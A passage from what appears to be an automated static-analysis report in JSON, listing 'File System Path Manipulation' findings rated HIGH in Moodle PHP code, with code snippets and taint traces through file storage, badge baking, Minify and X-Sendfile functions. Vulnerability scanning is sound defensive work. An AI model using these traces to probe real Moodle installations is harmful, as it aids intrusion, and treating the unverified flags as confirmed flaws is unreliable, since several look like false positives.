'/' . $newrecord->contenthash;\n // get mimetype by magic bytes\n $newrecord->mimetype = empty($filerecord->mimetype) ? $this->mimetype($filepathname, $filerecord->filename) : $filerecord->mimetype;\n\n $newrecord->pathnamehash = $this->get_pathname_hash($newrecord->contextid, $newrecord->component, $newrecord->filearea, $newrecord->itemid, $newrecord->filepath, $newrecord->filename);\n", "functionName": "Global.file_storage::create_file_from_string", "endLineNumber": 1577, "positionInStartLine": 79, "positionInEndLine": 107, "appercutAttackItemId": 9370, "startLineNumber": 1577}, {"sourceFileName": "moodle/lib/filestorage/file_storage.php", "code": " copy($hashfile, \"$this->filedir/jackpot/{$contenthash}_1\");\n file_put_contents(\"$this->filedir/jackpot/{$contenthash}_2\", $content);\n throw new file_pool_content_exception($contenthash);\n }\n debugging(\"Replacing invalid content file $contenthash\");\n unlink($hashfile);\n $newfile = false;\n }\n\n if (!is_dir($hashpath)) {\n if (!mkdir($hashpath, $this->dirpermissions, true)) {\n", "functionName": "Global.file_storage::add_string_to_pool", "endLineNumber": 2026, "positionInStartLine": 12, "positionInEndLine": 29, "appercutAttackItemId": 9381, "startLineNumber": 2026}, {"sourceFileName": "moodle/lib/filestorage/file_storage.php", "code": " global $CFG;\n\n $contenthash = sha1($content);\n $filesize = strlen($content); // binary length\n\n $hashpath = $this->path_from_hash($contenthash);\n $hashfile = \"$hashpath/$contenthash\";\n\n $newfile = true;\n\n if (file_exists($hashfile)) {\n", "functionName": "Global.file_storage::add_string_to_pool", "endLineNumber": 2009, "positionInStartLine": 27, "positionInEndLine": 55, "appercutAttackItemId": 9372, "startLineNumber": 2009}, {"sourceFileName": "moodle/badges/lib/bakerlib.php", "code": "\n // Chunk format: length + type + data + CRC.\n // CRC is a CRC-32 computed over the chunk type and chunk data.\n $newchunk = $len . $type . $data . $crc;\n\n $result = substr($this->_contents, 0, $this->_size - 12)\n . $newchunk\n . substr($this->_contents, $this->_size - 12, 12);\n\n return $result;\n }\n}\n", "functionName": "Global.PNG_MetaDataHandler::add_chunks", "endLineNumber": 137, "positionInStartLine": 8, "positionInEndLine": 65, "appercutAttackItemId": 9366, "startLineNumber": 135}, {"sourceFileName": "moodle/lib/filestorage/file_storage.php", "code": " // Hopefully this works around most potential race conditions.\n\n $prev = ignore_user_abort(true);\n\n if (!empty($CFG->preventfilelocking)) {\n $newsize = file_put_contents($hashfile.'.tmp', $content);\n } else {\n $newsize = file_put_contents($hashfile.'.tmp', $content, LOCK_EX);\n }\n\n if ($newsize === false) {\n", "functionName": "Global.file_storage::add_string_to_pool", "endLineNumber": 2042, "positionInStartLine": 23, "positionInEndLine": 68, "appercutAttackItemId": 9382, "startLineNumber": 2042}, {"sourceFileName": "moodle/lib/filestorage/file_storage.php", "code": " *\n * @param string $contenthash content hash\n * @return string expected file location\n */\n protected function path_from_hash($contenthash) {\n $l1 = $contenthash[0].$contenthash[1];\n $l2 = $contenthash[2].$contenthash[3];\n return \"$this->filedir/$l1/$l2\";\n }\n\n /**\n", "functionName": "Global.file_storage::path_from_hash", "endLineNumber": 2103, "positionInStartLine": 8, "positionInEndLine": 45, "appercutAttackItemId": 9373, "startLineNumber": 2103}, {"sourceFileName": "moodle/badges/lib/bakerlib.php", "code": "\n $result = substr($this->_contents, 0, $this->_size - 12)\n . $newchunk\n . substr($this->_contents, $this->_size - 12, 12);\n\n return $result;\n }\n}\n", "functionName": "Global.PNG_MetaDataHandler::add_chunks", "endLineNumber": 139, "positionInStartLine": 8, "positionInEndLine": 22, "appercutAttackItemId": 9367, "startLineNumber": 139}], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/InjectionPath.html", "positionInStartLine": 23, "patternDescription": "In order to define relative paths in file system, \u201c./\u201d \u201cand \u201c../\u201d characters are often used (with backslashes in Windows), representing current and parent directories, respectively. If the application responsible for forming paths to necessary files uses external data, the malicious user can advantage of it if the input is not filtered properly. As a result, the malicious user can read or write application server local files that were not intended by the developer.", "appercutVulnerName": "File System Path Manipulation", "endLineNumber": 2042, "positionInEndLine": 68, "startLineNumber": 2042, "patternCodeLanguage": "PHP", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/lib/filestorage/file_storage.php", "code": " $prev = ignore_user_abort(true);\n\n if (!empty($CFG->preventfilelocking)) {\n $newsize = file_put_contents($hashfile.'.tmp', $content);\n } else {\n $newsize = file_put_contents($hashfile.'.tmp', $content, LOCK_EX);\n }\n\n if ($newsize === false) {\n // Borked permissions most likely.\n ignore_user_abort($prev);\n", "vulnerId": "APPCUT:62:14655", "functionName": "None", "appercutAttackItems": [{"sourceFileName": "moodle/lib/badgeslib.php", "code": " $fs = get_file_storage();\n if (!$fs->file_exists($user_context->id, 'badges', 'userbadge', $badge->id, '/', $hash . '.png')) {\n if ($file = $fs->get_file($badge_context->id, 'badges', 'badgeimage', $badge->id, '/', 'f1.png')) {\n $contents = $file->get_content();\n\n $filehandler = new PNG_MetaDataHandler($contents);\n $assertion = new moodle_url('/badges/assertion.php', array('b' => $hash));\n if ($filehandler->check_chunks(\"tEXt\", \"openbadges\")) {\n // Add assertion URL tExt chunk.\n $newcontents = $filehandler->add_chunks(\"tEXt\", \"openbadges\", $assertion->out(false));\n $fileinfo = array(\n", "functionName": "Global.GlobalContext::badges_bake", "endLineNumber": 1020, "positionInStartLine": 27, "positionInEndLine": 61, "appercutAttackItemId": 9308, "startLineNumber": 1020}, {"sourceFileName": "moodle/badges/lib/bakerlib.php", "code": "\n // Chunk format: length + type + data + CRC.\n // CRC is a CRC-32 computed over the chunk type and chunk data.\n $newchunk = $len . $type . $data . $crc;\n\n $result = substr($this->_contents, 0, $this->_size - 12)\n . $newchunk\n . substr($this->_contents, $this->_size - 12, 12);\n\n return $result;\n }\n}\n", "functionName": "Global.PNG_MetaDataHandler::add_chunks", "endLineNumber": 137, "positionInStartLine": 8, "positionInEndLine": 65, "appercutAttackItemId": 9311, "startLineNumber": 135}, {"sourceFileName": "moodle/lib/badgeslib.php", "code": "\n $filehandler = new PNG_MetaDataHandler($contents);\n $assertion = new moodle_url('/badges/assertion.php', array('b' => $hash));\n if ($filehandler->check_chunks(\"tEXt\", \"openbadges\")) {\n // Add assertion URL tExt chunk.\n $newcontents = $filehandler->add_chunks(\"tEXt\", \"openbadges\", $assertion->out(false));\n $fileinfo = array(\n 'contextid' => $user_context->id,\n 'component' => 'badges',\n 'filearea' => 'userbadge',\n 'itemid' => $badge->id,\n", "functionName": "Global.GlobalContext::badges_bake", "endLineNumber": 1024, "positionInStartLine": 16, "positionInEndLine": 101, "appercutAttackItemId": 9313, "startLineNumber": 1024}, {"sourceFileName": "moodle/lib/filestorage/file_storage.php", "code": " global $CFG;\n\n $contenthash = sha1($content);\n $filesize = strlen($content); // binary length\n\n $hashpath = $this->path_from_hash($contenthash);\n $hashfile = \"$hashpath/$contenthash\";\n\n $newfile = true;\n\n if (file_exists($hashfile)) {\n", "functionName": "Global.file_storage::add_string_to_pool", "endLineNumber": 2009, "positionInStartLine": 27, "positionInEndLine": 55, "appercutAttackItemId": 9317, "startLineNumber": 2009}, {"sourceFileName": "moodle/lib/filestorage/file_storage.php", "code": " $hashfile = \"$hashpath/$contenthash\";\n\n $newfile = true;\n\n if (file_exists($hashfile)) {\n if (filesize($hashfile) === $filesize) {\n return array($contenthash, $filesize, false);\n }\n if (sha1_file($hashfile) === $contenthash) {\n // Jackpot! We have a sha1 collision.\n mkdir(\"$this->filedir/jackpot/\", $this->dirpermissions, true);\n", "functionName": "Global.file_storage::add_string_to_pool", "endLineNumber": 2015, "positionInStartLine": 16, "positionInEndLine": 36, "appercutAttackItemId": 9323, "startLineNumber": 2015}, {"sourceFileName": "moodle/lib/filestorage/file_storage.php", "code": " * @return string expected file location\n */\n protected function path_from_hash($contenthash) {\n $l1 = $contenthash[0].$contenthash[1];\n $l2 = $contenthash[2].$contenthash[3];\n return \"$this->filedir/$l1/$l2\";\n }\n\n /**\n * Return path to file with given hash.\n *\n", "functionName": "Global.file_storage::path_from_hash", "endLineNumber": 2105, "positionInStartLine": 8, "positionInEndLine": 39, "appercutAttackItemId": 9319, "startLineNumber": 2105}, {"sourceFileName": "moodle/lib/filestorage/file_storage.php", "code": "\n if (file_exists($hashfile)) {\n if (filesize($hashfile) === $filesize) {\n return array($contenthash, $filesize, false);\n }\n if (sha1_file($hashfile) === $contenthash) {\n // Jackpot! We have a sha1 collision.\n mkdir(\"$this->filedir/jackpot/\", $this->dirpermissions, true);\n copy($hashfile, \"$this->filedir/jackpot/{$contenthash}_1\");\n file_put_contents(\"$this->filedir/jackpot/{$contenthash}_2\", $content);\n throw new file_pool_content_exception($contenthash);\n", "functionName": "Global.file_storage::add_string_to_pool", "endLineNumber": 2018, "positionInStartLine": 16, "positionInEndLine": 37, "appercutAttackItemId": 9324, "startLineNumber": 2018}, {"sourceFileName": "moodle/badges/lib/bakerlib.php", "code": "\n // Chunk format: length + type + data + CRC.\n // CRC is a CRC-32 computed over the chunk type and chunk data.\n $newchunk = $len . $type . $data . $crc;\n\n $result = substr($this->_contents, 0, $this->_size - 12)\n . $newchunk\n . substr($this->_contents, $this->_size - 12, 12);\n\n return $result;\n }\n}\n", "functionName": "Global.PNG_MetaDataHandler::add_chunks", "endLineNumber": 136, "positionInStartLine": 18, "positionInEndLine": 16, "appercutAttackItemId": 9310, "startLineNumber": 135}, {"sourceFileName": "moodle/lib/filestorage/file_storage.php", "code": " * @return array (contenthash, filesize, newfile)\n */\n public function add_string_to_pool($content) {\n global $CFG;\n\n $contenthash = sha1($content);\n $filesize = strlen($content); // binary length\n\n $hashpath = $this->path_from_hash($contenthash);\n $hashfile = \"$hashpath/$contenthash\";\n\n", "functionName": "Global.file_storage::add_string_to_pool", "endLineNumber": 2006, "positionInStartLine": 8, "positionInEndLine": 37, "appercutAttackItemId": 9316, "startLineNumber": 2006}, {"sourceFileName": "moodle/badges/lib/bakerlib.php", "code": " * Unpacks file chunks and reads them into an array.\n *\n * @param string $contents File content as a string\n */\n public function __construct($contents) {\n $this->_contents = $contents;\n $png_signature = pack(\"C8\", 137, 80, 78, 71, 13, 10, 26, 10);\n\n // Read 8 bytes of PNG header and verify.\n $header = substr($this->_contents, 0, 8);\n\n", "functionName": "Global.PNG_MetaDataHandler::Constructor", "endLineNumber": 60, "positionInStartLine": 8, "positionInEndLine": 36, "appercutAttackItemId": 9309, "startLineNumber": 60}, {"sourceFileName": "moodle/lib/badgeslib.php", "code": " 'filepath' => '/',\n 'filename' => $hash . '.png',\n );\n\n // Create a file with added contents.\n $newfile = $fs->create_file_from_string($fileinfo, $newcontents);\n if ($pathhash) {\n return $newfile->get_pathnamehash();\n }\n }\n } else {\n", "functionName": "Global.GlobalContext::badges_bake", "endLineNumber": 1035, "positionInStartLine": 32, "positionInEndLine": 80, "appercutAttackItemId": 9314, "startLineNumber": 1035}, {"sourceFileName": "moodle/lib/filestorage/file_storage.php", "code": " $hashpath = $this->path_from_hash($contenthash);\n $hashfile = \"$hashpath/$contenthash\";\n\n $newfile = true;\n\n if (file_exists($hashfile)) {\n if (filesize($hashfile) === $filesize) {\n return array($contenthash, $filesize, false);\n }\n if (sha1_file($hashfile) === $contenthash) {\n // Jackpot! We have a sha1 collision.\n", "functionName": "Global.file_storage::add_string_to_pool", "endLineNumber": 2014, "positionInStartLine": 12, "positionInEndLine": 34, "appercutAttackItemId": 9322, "startLineNumber": 2014}, {"sourceFileName": "moodle/lib/filestorage/stored_file.php", "code": " if (!is_readable($path)) {\n if (!$this->fs->try_content_recovery($this) or !is_readable($path)) {\n throw new file_exception('storedfilecannotread', '', $path);\n }\n }\n return file_get_contents($this->get_content_file_location());\n }\n\n /**\n * Copy content of file to given pathname.\n *\n", "functionName": "Global.stored_file::get_content", "endLineNumber": 463, "positionInStartLine": 8, "positionInEndLine": 68, "appercutAttackItemId": 9306, "startLineNumber": 463}, {"sourceFileName": "moodle/lib/filestorage/file_storage.php", "code": " copy($hashfile, \"$this->filedir/jackpot/{$contenthash}_1\");\n file_put_contents(\"$this->filedir/jackpot/{$contenthash}_2\", $content);\n throw new file_pool_content_exception($contenthash);\n }\n debugging(\"Replacing invalid content file $contenthash\");\n unlink($hashfile);\n $newfile = false;\n }\n\n if (!is_dir($hashpath)) {\n if (!mkdir($hashpath, $this->dirpermissions, true)) {\n", "functionName": "Global.file_storage::add_string_to_pool", "endLineNumber": 2026, "positionInStartLine": 12, "positionInEndLine": 29, "appercutAttackItemId": 9326, "startLineNumber": 2026}, {"sourceFileName": "moodle/lib/filestorage/file_storage.php", "code": " return array($contenthash, $filesize, false);\n }\n if (sha1_file($hashfile) === $contenthash) {\n // Jackpot! We have a sha1 collision.\n mkdir(\"$this->filedir/jackpot/\", $this->dirpermissions, true);\n copy($hashfile, \"$this->filedir/jackpot/{$contenthash}_1\");\n file_put_contents(\"$this->filedir/jackpot/{$contenthash}_2\", $content);\n throw new file_pool_content_exception($contenthash);\n }\n debugging(\"Replacing invalid content file $contenthash\");\n unlink($hashfile);\n", "functionName": "Global.file_storage::add_string_to_pool", "endLineNumber": 2021, "positionInStartLine": 16, "positionInEndLine": 74, "appercutAttackItemId": 9325, "startLineNumber": 2021}, {"sourceFileName": "moodle/lib/filestorage/file_storage.php", "code": " $newrecord->author = empty($filerecord->author) ? null : $filerecord->author;\n $newrecord->license = empty($filerecord->license) ? null : $filerecord->license;\n $newrecord->status = empty($filerecord->status) ? 0 : $filerecord->status;\n $newrecord->sortorder = $filerecord->sortorder;\n\n list($newrecord->contenthash, $newrecord->filesize, $newfile) = $this->add_string_to_pool($content);\n $filepathname = $this->path_from_hash($newrecord->contenthash) . '/' . $newrecord->contenthash;\n // get mimetype by magic bytes\n $newrecord->mimetype = empty($filerecord->mimetype) ? $this->mimetype($filepathname, $filerecord->filename) : $filerecord->mimetype;\n\n $newrecord->pathnamehash = $this->get_pathname_hash($newrecord->contextid, $newrecord->component, $newrecord->filearea, $newrecord->itemid, $newrecord->filepath, $newrecord->filename);\n", "functionName": "Global.file_storage::create_file_from_string", "endLineNumber": 1577, "positionInStartLine": 79, "positionInEndLine": 107, "appercutAttackItemId": 9315, "startLineNumber": 1577}, {"sourceFileName": "moodle/lib/filestorage/file_storage.php", "code": " // Hopefully this works around most potential race conditions.\n\n $prev = ignore_user_abort(true);\n\n if (!empty($CFG->preventfilelocking)) {\n $newsize = file_put_contents($hashfile.'.tmp', $content);\n } else {\n $newsize = file_put_contents($hashfile.'.tmp', $content, LOCK_EX);\n }\n\n if ($newsize === false) {\n", "functionName": "Global.file_storage::add_string_to_pool", "endLineNumber": 2042, "positionInStartLine": 23, "positionInEndLine": 68, "appercutAttackItemId": 9327, "startLineNumber": 2042}, {"sourceFileName": "moodle/lib/filestorage/file_storage.php", "code": " $prev = ignore_user_abort(true);\n\n if (!empty($CFG->preventfilelocking)) {\n $newsize = file_put_contents($hashfile.'.tmp', $content);\n } else {\n $newsize = file_put_contents($hashfile.'.tmp', $content, LOCK_EX);\n }\n\n if ($newsize === false) {\n // Borked permissions most likely.\n ignore_user_abort($prev);\n", "functionName": "Global.file_storage::add_string_to_pool", "endLineNumber": 2044, "positionInStartLine": 23, "positionInEndLine": 77, "appercutAttackItemId": 9328, "startLineNumber": 2044}, {"sourceFileName": "moodle/badges/lib/bakerlib.php", "code": "\n $result = substr($this->_contents, 0, $this->_size - 12)\n . $newchunk\n . substr($this->_contents, $this->_size - 12, 12);\n\n return $result;\n }\n}\n", "functionName": "Global.PNG_MetaDataHandler::add_chunks", "endLineNumber": 139, "positionInStartLine": 8, "positionInEndLine": 22, "appercutAttackItemId": 9312, "startLineNumber": 139}, {"sourceFileName": "moodle/lib/filestorage/file_storage.php", "code": " *\n * @param string $contenthash content hash\n * @return string expected file location\n */\n protected function path_from_hash($contenthash) {\n $l1 = $contenthash[0].$contenthash[1];\n $l2 = $contenthash[2].$contenthash[3];\n return \"$this->filedir/$l1/$l2\";\n }\n\n /**\n", "functionName": "Global.file_storage::path_from_hash", "endLineNumber": 2103, "positionInStartLine": 8, "positionInEndLine": 45, "appercutAttackItemId": 9318, "startLineNumber": 2103}, {"sourceFileName": "moodle/lib/badgeslib.php", "code": " $user_context = context_user::instance($userid);\n\n $fs = get_file_storage();\n if (!$fs->file_exists($user_context->id, 'badges', 'userbadge', $badge->id, '/', $hash . '.png')) {\n if ($file = $fs->get_file($badge_context->id, 'badges', 'badgeimage', $badge->id, '/', 'f1.png')) {\n $contents = $file->get_content();\n\n $filehandler = new PNG_MetaDataHandler($contents);\n $assertion = new moodle_url('/badges/assertion.php', array('b' => $hash));\n if ($filehandler->check_chunks(\"tEXt\", \"openbadges\")) {\n // Add assertion URL tExt chunk.\n", "functionName": "Global.GlobalContext::badges_bake", "endLineNumber": 1018, "positionInStartLine": 12, "positionInEndLine": 44, "appercutAttackItemId": 9307, "startLineNumber": 1018}, {"sourceFileName": "moodle/lib/filestorage/file_storage.php", "code": " global $CFG;\n\n $contenthash = sha1($content);\n $filesize = strlen($content); // binary length\n\n $hashpath = $this->path_from_hash($contenthash);\n $hashfile = \"$hashpath/$contenthash\";\n\n $newfile = true;\n\n if (file_exists($hashfile)) {\n", "functionName": "Global.file_storage::add_string_to_pool", "endLineNumber": 2009, "positionInStartLine": 8, "positionInEndLine": 55, "appercutAttackItemId": 9320, "startLineNumber": 2009}, {"sourceFileName": "moodle/lib/filestorage/file_storage.php", "code": "\n $contenthash = sha1($content);\n $filesize = strlen($content); // binary length\n\n $hashpath = $this->path_from_hash($contenthash);\n $hashfile = \"$hashpath/$contenthash\";\n\n $newfile = true;\n\n if (file_exists($hashfile)) {\n if (filesize($hashfile) === $filesize) {\n", "functionName": "Global.file_storage::add_string_to_pool", "endLineNumber": 2010, "positionInStartLine": 8, "positionInEndLine": 44, "appercutAttackItemId": 9321, "startLineNumber": 2010}], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/InjectionPath.html", "positionInStartLine": 23, "patternDescription": "In order to define relative paths in file system, \u201c./\u201d \u201cand \u201c../\u201d characters are often used (with backslashes in Windows), representing current and parent directories, respectively. If the application responsible for forming paths to necessary files uses external data, the malicious user can advantage of it if the input is not filtered properly. As a result, the malicious user can read or write application server local files that were not intended by the developer.", "appercutVulnerName": "File System Path Manipulation", "endLineNumber": 2044, "positionInEndLine": 77, "startLineNumber": 2044, "patternCodeLanguage": "PHP", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/lib/minify/lib/Minify/Controller/Version1.php", "code": " \n foreach ($files as $file) {\n // prepend appropriate string for abs/rel paths\n $file = ($file[0] === '/' ? $prependAbsPaths : $prependRelPaths) . $file;\n // make sure a real file!\n $file = realpath($file);\n // don't allow unsafe or duplicate files\n if (parent::_fileIsSafe($file, $allowDirs) \n && !in_array($file, $goodFiles)) \n {\n $goodFiles[] = $file;\n", "vulnerId": "APPCUT:62:14647", "functionName": "None", "appercutAttackItems": [{"sourceFileName": "moodle/lib/minify/lib/Minify/Controller/Version1.php", "code": " \n $allowDirs = isset($options['allowDirs'])\n ? $options['allowDirs']\n : MINIFY_BASE_DIR;\n \n foreach ($files as $file) {\n // prepend appropriate string for abs/rel paths\n $file = ($file[0] === '/' ? $prependAbsPaths : $prependRelPaths) . $file;\n // make sure a real file!\n $file = realpath($file);\n // don't allow unsafe or duplicate files\n", "functionName": "Global.Minify_Controller_Version1::setupSources", "endLineNumber": 75, "positionInStartLine": 17, "positionInEndLine": 32, "appercutAttackItemId": 9209, "startLineNumber": 75}, {"sourceFileName": "moodle/lib/minify/lib/Minify/Controller/Version1.php", "code": " ) {\n return $options;\n }\n\n $files = explode(',', $_GET['files']);\n if (count($files) > MINIFY_MAX_FILES) {\n return $options;\n }\n \n // strings for prepending to relative/absolute paths\n $prependRelPaths = dirname($_SERVER['SCRIPT_FILENAME'])\n", "functionName": "Global.Minify_Controller_Version1::setupSources", "endLineNumber": 59, "positionInStartLine": 12, "positionInEndLine": 26, "appercutAttackItemId": 9208, "startLineNumber": 59}, {"sourceFileName": "moodle/lib/minify/lib/Minify/Controller/Version1.php", "code": " ? $options['allowDirs']\n : MINIFY_BASE_DIR;\n \n foreach ($files as $file) {\n // prepend appropriate string for abs/rel paths\n $file = ($file[0] === '/' ? $prependAbsPaths : $prependRelPaths) . $file;\n // make sure a real file!\n $file = realpath($file);\n // don't allow unsafe or duplicate files\n if (parent::_fileIsSafe($file, $allowDirs) \n && !in_array($file, $goodFiles)) \n", "functionName": "Global.Minify_Controller_Version1::setupSources", "endLineNumber": 77, "positionInStartLine": 12, "positionInEndLine": 84, "appercutAttackItemId": 9210, "startLineNumber": 77}, {"sourceFileName": "moodle/lib/minify/lib/Minify/Controller/Version1.php", "code": " \n foreach ($files as $file) {\n // prepend appropriate string for abs/rel paths\n $file = ($file[0] === '/' ? $prependAbsPaths : $prependRelPaths) . $file;\n // make sure a real file!\n $file = realpath($file);\n // don't allow unsafe or duplicate files\n if (parent::_fileIsSafe($file, $allowDirs) \n && !in_array($file, $goodFiles)) \n {\n $goodFiles[] = $file;\n", "functionName": "Global.Minify_Controller_Version1::setupSources", "endLineNumber": 79, "positionInStartLine": 20, "positionInEndLine": 35, "appercutAttackItemId": 9211, "startLineNumber": 79}, {"sourceFileName": "moodle/lib/minify/lib/Minify/Controller/Version1.php", "code": " || preg_match('/(?:^|[^\\\\.])\\\\.\\\\//', $_GET['files'])\n ) {\n return $options;\n }\n\n $files = explode(',', $_GET['files']);\n if (count($files) > MINIFY_MAX_FILES) {\n return $options;\n }\n \n // strings for prepending to relative/absolute paths\n", "functionName": "Global.Minify_Controller_Version1::setupSources", "endLineNumber": 58, "positionInStartLine": 8, "positionInEndLine": 45, "appercutAttackItemId": 9207, "startLineNumber": 58}], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/InjectionPath.html", "positionInStartLine": 20, "patternDescription": "In order to define relative paths in file system, \u201c./\u201d \u201cand \u201c../\u201d characters are often used (with backslashes in Windows), representing current and parent directories, respectively. If the application responsible for forming paths to necessary files uses external data, the malicious user can advantage of it if the input is not filtered properly. As a result, the malicious user can read or write application server local files that were not intended by the developer.", "appercutVulnerName": "File System Path Manipulation", "endLineNumber": 79, "positionInEndLine": 35, "startLineNumber": 79, "patternCodeLanguage": "PHP", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/lib/xsendfilelib.php", "code": " if (!$aliased) {\n return false;\n }\n }\n\n header(\"$CFG->xsendfile: $filepath\");\n\n return true;\n}\n", "vulnerId": "APPCUT:62:14521", "functionName": "None", "appercutAttackItems": [{"sourceFileName": "moodle/lib/filelib.php", "code": " }\n\n $lastmodified = is_object($file) ? $file->get_timemodified() : filemtime($file);\n header('Last-Modified: '. gmdate('D, d M Y H:i:s', $lastmodified) .' GMT');\n\n if (is_object($file)) {\n header('Etag: \"' . $file->get_contenthash() . '\"');\n if (isset($_SERVER['HTTP_IF_NONE_MATCH']) and trim($_SERVER['HTTP_IF_NONE_MATCH'], '\"') === $file->get_contenthash()) {\n header('HTTP/1.1 304 Not Modified');\n return;\n }\n", "functionName": "Global.GlobalContext::readfile_accel", "endLineNumber": 1873, "positionInStartLine": 8, "positionInEndLine": 24, "appercutAttackItemId": 8965, "startLineNumber": 1873}, {"sourceFileName": "moodle/repository/dropbox/lib.php", "code": " try {\n $access_key = get_user_preferences($this->setting.'_access_key', '');\n $access_secret = get_user_preferences($this->setting.'_access_secret', '');\n $this->dropbox->set_access_token($access_key, $access_secret);\n $this->dropbox->get_thumbnail($source, $saveas, $CFG->repositorysyncimagetimeout);\n $content = file_get_contents($saveas);\n unlink($saveas);\n // set 30 days lifetime for the image. If the image is changed in dropbox it will have\n // different revision number and URL will be different. It is completely safe\n // to cache thumbnail in the browser for a long time\n send_file($content, basename($source), 30*24*60*60, 0, true);\n", "functionName": "Global.repository_dropbox::send_thumbnail", "endLineNumber": 279, "positionInStartLine": 12, "positionInEndLine": 49, "appercutAttackItemId": 8960, "startLineNumber": 279}, {"sourceFileName": "moodle/lib/xsendfilelib.php", "code": " if (!$aliased) {\n return false;\n }\n }\n\n header(\"$CFG->xsendfile: $filepath\");\n\n return true;\n}\n", "functionName": "Global.GlobalContext::xsendfile", "endLineNumber": 83, "positionInStartLine": 4, "positionInEndLine": 40, "appercutAttackItemId": 8973, "startLineNumber": 83}, {"sourceFileName": "moodle/lib/xsendfilelib.php", "code": "\n if (headers_sent()) {\n return false;\n }\n\n $filepath = realpath($filepath);\n\n $aliased = false;\n if (!empty($CFG->xsendfilealiases) and is_array($CFG->xsendfilealiases)) {\n foreach ($CFG->xsendfilealiases as $alias=>$dir) {\n $dir = realpath($dir);\n", "functionName": "Global.GlobalContext::xsendfile", "endLineNumber": 50, "positionInStartLine": 4, "positionInEndLine": 35, "appercutAttackItemId": 8970, "startLineNumber": 50}, {"sourceFileName": "moodle/lib/filelib.php", "code": " header('Accept-Ranges: bytes');\n } else {\n header('Accept-Ranges: none');\n }\n\n if (is_object($file)) {\n $fs = get_file_storage();\n if ($fs->xsendfile($file->get_contenthash())) {\n return;\n }\n\n", "functionName": "Global.GlobalContext::readfile_accel", "endLineNumber": 1898, "positionInStartLine": 12, "positionInEndLine": 28, "appercutAttackItemId": 8967, "startLineNumber": 1898}, {"sourceFileName": "moodle/lib/xsendfilelib.php", "code": " }\n if (substr($dir, -1) !== DIRECTORY_SEPARATOR) {\n // add trailing dir separator\n $dir .= DIRECTORY_SEPARATOR;\n }\n if (strpos($filepath, $dir) === 0) {\n $filepath = $alias.substr($filepath, strlen($dir));\n $aliased = true;\n break;\n }\n }\n", "functionName": "Global.GlobalContext::xsendfile", "endLineNumber": 63, "positionInStartLine": 16, "positionInEndLine": 40, "appercutAttackItemId": 8971, "startLineNumber": 63}, {"sourceFileName": "moodle/lib/filelib.php", "code": " }\n\n if (empty($filter)) {\n // send the contents\n if ($pathisstring) {\n readstring_accel($path, $mimetype, !$dontdie);\n } else {\n readfile_accel($path, $mimetype, !$dontdie);\n }\n\n } else {\n", "functionName": "Global.GlobalContext::send_file", "endLineNumber": 2150, "positionInStartLine": 12, "positionInEndLine": 57, "appercutAttackItemId": 8962, "startLineNumber": 2150}, {"sourceFileName": "moodle/lib/filelib.php", "code": " if (empty($filter)) {\n // send the contents\n if ($pathisstring) {\n readstring_accel($path, $mimetype, !$dontdie);\n } else {\n readfile_accel($path, $mimetype, !$dontdie);\n }\n\n } else {\n // Try to put the file through filters\n if ($mimetype == 'text/html' || $mimetype == 'application/xhtml+xml') {\n", "functionName": "Global.GlobalContext::send_file", "endLineNumber": 2152, "positionInStartLine": 12, "positionInEndLine": 55, "appercutAttackItemId": 8963, "startLineNumber": 2152}, {"sourceFileName": "moodle/lib/filelib.php", "code": " return;\n }\n }\n\n // if etag present for stored file rely on it exclusively\n if (!empty($_SERVER['HTTP_IF_MODIFIED_SINCE']) and (empty($_SERVER['HTTP_IF_NONE_MATCH']) or !is_object($file))) {\n // get unixtime of request header; clip extra junk off first\n $since = strtotime(preg_replace('/;.*$/', '', $_SERVER[\"HTTP_IF_MODIFIED_SINCE\"]));\n if ($since && $since >= $lastmodified) {\n header('HTTP/1.1 304 Not Modified');\n return;\n", "functionName": "Global.GlobalContext::readfile_accel", "endLineNumber": 1882, "positionInStartLine": 98, "positionInEndLine": 114, "appercutAttackItemId": 8966, "startLineNumber": 1882}, {"sourceFileName": "moodle/lib/filelib.php", "code": " header('Content-Type: text/plain; charset=utf-8');\n } else {\n header('Content-Type: '.$mimetype);\n }\n\n $lastmodified = is_object($file) ? $file->get_timemodified() : filemtime($file);\n header('Last-Modified: '. gmdate('D, d M Y H:i:s', $lastmodified) .' GMT');\n\n if (is_object($file)) {\n header('Etag: \"' . $file->get_contenthash() . '\"');\n if (isset($_SERVER['HTTP_IF_NONE_MATCH']) and trim($_SERVER['HTTP_IF_NONE_MATCH'], '\"') === $file->get_contenthash()) {\n", "functionName": "Global.GlobalContext::readfile_accel", "endLineNumber": 1870, "positionInStartLine": 67, "positionInEndLine": 83, "appercutAttackItemId": 8964, "startLineNumber": 1870}, {"sourceFileName": "moodle/lib/xsendfilelib.php", "code": " if (substr($dir, -1) !== DIRECTORY_SEPARATOR) {\n // add trailing dir separator\n $dir .= DIRECTORY_SEPARATOR;\n }\n if (strpos($filepath, $dir) === 0) {\n $filepath = $alias.substr($filepath, strlen($dir));\n $aliased = true;\n break;\n }\n }\n }\n", "functionName": "Global.GlobalContext::xsendfile", "endLineNumber": 64, "positionInStartLine": 35, "positionInEndLine": 66, "appercutAttackItemId": 8972, "startLineNumber": 64}, {"sourceFileName": "moodle/lib/xsendfilelib.php", "code": "\n if (empty($CFG->xsendfile)) {\n return false;\n }\n\n if (!file_exists($filepath)) {\n return false;\n }\n\n if (headers_sent()) {\n return false;\n", "functionName": "Global.GlobalContext::xsendfile", "endLineNumber": 42, "positionInStartLine": 9, "positionInEndLine": 31, "appercutAttackItemId": 8969, "startLineNumber": 42}, {"sourceFileName": "moodle/lib/filelib.php", "code": " return;\n }\n\n } else {\n require_once(\"$CFG->libdir/xsendfilelib.php\");\n if (xsendfile($file)) {\n return;\n }\n }\n }\n\n", "functionName": "Global.GlobalContext::readfile_accel", "endLineNumber": 1906, "positionInStartLine": 16, "positionInEndLine": 32, "appercutAttackItemId": 8968, "startLineNumber": 1906}, {"sourceFileName": "moodle/repository/dropbox/lib.php", "code": " $content = file_get_contents($saveas);\n unlink($saveas);\n // set 30 days lifetime for the image. If the image is changed in dropbox it will have\n // different revision number and URL will be different. It is completely safe\n // to cache thumbnail in the browser for a long time\n send_file($content, basename($source), 30*24*60*60, 0, true);\n } catch (Exception $e) {}\n }\n\n /**\n * Logout from dropbox\n", "functionName": "Global.repository_dropbox::send_thumbnail", "endLineNumber": 284, "positionInStartLine": 12, "positionInEndLine": 